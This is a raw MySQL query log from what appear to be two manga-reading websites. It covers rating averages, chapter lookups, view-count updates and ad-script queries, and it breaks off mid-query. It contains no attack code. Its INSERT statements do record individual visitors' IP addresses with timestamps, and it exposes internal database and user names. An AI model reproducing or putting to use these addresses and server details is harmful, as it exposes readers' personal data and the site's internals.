Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330642522 Quit 330642523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330642523 Quit 330642524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330642524 Quit 330642525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330642525 Quit 330642526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330642526 Quit 330642527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330642527 Quit 330642528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330642528 Quit 330642529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330642529 Quit 330642530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330642530 Quit 330642531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330642531 Quit 330642532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330642532 Quit 330642533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330642533 Quit 330642534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330642534 Quit 330642535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330642535 Quit 330642536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330642536 Quit 330642537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330642537 Quit 330642538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330642538 Quit 330642539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330642539 Quit 330642540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330642540 Quit 330642541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330642541 Quit 330642542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330642542 Quit 330642543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330642543 Quit 330642544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330642544 Quit 330642545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330642545 Quit 330642546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330642546 Quit 330642547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330642547 Quit 330642548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330642548 Quit 330642549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330642549 Quit 330642550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330642550 Quit 330642551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330642551 Quit 330642552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330642552 Quit 330642553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330642553 Quit 330642554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330642554 Quit 330642555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330642555 Quit 330642556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330642556 Quit 330642557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330642557 Quit 330642558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330642558 Quit 330642559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330642559 Quit 330642560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330642560 Quit 330642561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330642561 Quit 330642562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330642562 Quit 330642563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330642563 Quit 330642564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330642564 Quit 330642565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330642565 Quit 330642566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330642566 Quit 330642567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330642567 Quit 330642568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330642568 Quit 330642569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330642569 Quit 330642570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330642570 Quit 330642571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330642571 Quit 330642572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330642572 Quit 330642573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330642573 Quit 330642574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330642574 Quit 330642575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330642575 Quit 330642576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330642576 Quit 330642577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330642577 Quit 330642578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330642578 Quit 330642579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330642579 Quit 330642580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330642580 Quit 330642581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330642581 Quit 330642582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330642582 Quit 330642583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330642583 Quit 330642584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330642584 Quit 330642585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330642585 Quit 330642586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330642586 Quit 330642587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330642587 Quit 330642588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330642588 Quit 330642589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330642589 Quit 330642590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330642590 Quit 330642591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330642591 Quit 330642592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330642592 Quit 330642593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330642593 Quit 330642594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330642594 Quit 330642595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330642595 Quit 330642596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330642596 Quit 330642597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330642597 Quit 330642598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330642598 Quit 330642599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642599 Quit 330642600 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642600 Quit 260225 19:28:12 330642601 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642602 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642601 Quit 330642602 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY (k.id * FLOOR(1 + RAND() * 100000)) % 100000 DESC limit 10 330642602 Quit 330642603 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642603 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 50 330642603 Quit 330642604 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642604 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330642604 Quit 330642605 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642606 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642605 Quit 330642606 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642606 Quit 330642607 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642608 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642607 Quit 330642608 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11527' and m.active = 1 330642608 Quit 330642609 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642609 Query select * FROM chapters where id = '11527' 330642609 Quit 330642610 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642610 Query select * FROM chapters where manga_id = '193' order by display_priority ASC, id desc 330642610 Quit 330642611 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642611 Query Update chapters set view=view+1 where id = '11527' 330642611 Quit 330642612 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642612 Query select * FROM chapters where id = '11527' 330642613 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642612 Quit 330642613 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11527' and m.active = 1 330642613 Quit 330642614 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642614 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('193', '11527', '104.249.72.22', 'mangaberri.com', '2026-02-26 03:28:12', '2026-02-26 03:28:12') 330642614 Quit 330642615 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642615 Query select * FROM chapter_images where chapter_id = '11527' 330642615 Quit 330642616 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642616 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' and m.active = 1 330642616 Quit 330642617 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642617 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='193' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%School%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330642617 Quit 330642618 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642619 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642618 Quit 330642619 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642619 Quit 330642620 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642621 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642620 Quit 330642621 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642621 Quit 330642622 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642623 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642623 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642622 Quit 330642623 Quit 330642624 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642625 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642624 Quit 330642625 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642625 Quit 260225 19:28:13 330642626 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642627 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642626 Quit 330642627 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7172' and m.active = 1 330642627 Quit 330642628 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642628 Query select * FROM chapters where id = '7172' 330642628 Quit 330642629 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642629 Query select * FROM chapters where manga_id = '183' order by display_priority ASC, id desc 330642629 Quit 330642630 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642630 Query Update chapters set view=view+1 where id = '7172' 330642630 Quit 330642631 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642631 Query select * FROM chapters where id = '7172' 330642632 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642632 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7172' and m.active = 1 330642631 Quit 330642632 Quit 330642633 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642633 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('183', '7172', '66.208.12.146', 'mangaberri.com', '2026-02-26 03:28:13', '2026-02-26 03:28:13') 330642633 Quit 330642634 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642634 Query select * FROM chapter_images where chapter_id = '7172' 330642634 Quit 330642635 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642635 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '183' and m.active = 1 330642635 Quit 330642636 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642636 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='183' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Ecchi%' OR genres like '%Fantasy%') ORDER BY RAND() limit 10 330642636 Quit 330642637 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642638 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642637 Quit 330642638 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642638 Quit 330642639 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642640 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642639 Quit 330642640 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642640 Quit 330642641 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642642 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642642 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642641 Quit 330642642 Quit 330642643 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642644 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642643 Quit 330642644 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642644 Quit 330642645 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642646 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642645 Quit 330642646 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '408' and m.active = 1 330642646 Quit 330642647 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642647 Query select * FROM chapters where id = '408' 330642647 Quit 330642648 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642648 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330642648 Quit 330642649 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642649 Query Update chapters set view=view+1 where id = '408' 330642649 Quit 330642650 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642650 Query select * FROM chapters where id = '408' 330642651 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642650 Quit 330642651 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '408' and m.active = 1 330642651 Quit 330642652 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642652 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '408', '172.56.27.14', 'mangaberri.com', '2026-02-26 03:28:13', '2026-02-26 03:28:13') 330642652 Quit 330642653 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642653 Query select * FROM chapter_images where chapter_id = '408' 330642653 Quit 330642654 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642654 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330642654 Quit 330642655 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642655 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330642655 Quit 330642656 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642657 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642656 Quit 330642657 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642657 Quit 330642658 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642659 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642658 Quit 330642659 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642659 Quit 330642660 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642661 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642660 Quit 330642661 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642661 Quit 330642662 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642663 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642662 Quit 330642663 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642663 Quit 330642664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642664 Quit 330642665 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16944' 330642665 Quit 330642666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642666 Query select * FROM chapters where id = '16944' 330642666 Quit 330642667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642667 Query select * FROM chapters where manga_id = '197' order by id desc 330642667 Quit 330642668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642668 Query Update chapters set view=view+1 where id = '16944' 330642668 Quit 330642669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642669 Query select * FROM chapters where id = '16944' 330642669 Quit 330642670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642670 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16944' 330642670 Quit 330642671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642671 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '16944', '2001:4860:7:511::ee', 'mangacherri.com', '2026-02-26 03:28:13', '2026-02-26 03:28:13') 330642671 Quit 330642672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642672 Query select * FROM chapter_images where chapter_id = '16944' 330642672 Quit 330642673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642673 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330642673 Quit 330642674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642674 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like 